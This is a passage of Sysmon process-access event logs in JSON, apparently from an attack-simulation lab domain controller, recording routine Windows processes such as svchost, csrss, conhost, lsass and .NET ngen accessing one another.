ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.632","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6456,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.632\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.632","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6457,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.632\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.632","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6458,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.648\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-001028BB0900}\r\nTargetProcessId: 3152\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.648","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-001028BB0900}","TargetProcessId":"3152","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6459,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.648\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-001028BB0900}\r\nSourceProcessId: 3152\r\nSourceThreadId: 3288\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-00104CBA0900}\r\nTargetProcessId: 4644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.648","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-001028BB0900}","SourceProcessId":"3152","SourceThreadId":"3288","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-00104CBA0900}","TargetProcessId":"4644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6460,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.664\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-0010E0B70900}\r\nSourceProcessId: 3060\r\nSourceThreadId: 4352\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-001053BC0900}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFD152E5147)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.664","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-0010E0B70900}","SourceProcessId":"3060","SourceThreadId":"4352","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-001053BC0900}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFD152E5147)","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6461,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.664\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-001053BC0900}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.664","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-001053BC0900}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6462,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.679\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-001060B80900}\r\nSourceProcessId: 4440\r\nSourceThreadId: 1436\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-001053BC0900}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.679","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-001060B80900}","SourceProcessId":"4440","SourceThreadId":"1436","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-001053BC0900}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6463,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.679\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-001053BC0900}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.679","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-001053BC0900}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6464,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.679\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-001053BC0900}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.679","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-001053BC0900}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6465,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.710\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-0010E0B70900}\r\nSourceProcessId: 3060\r\nSourceThreadId: 4352\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nTargetProcessId: 3144\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 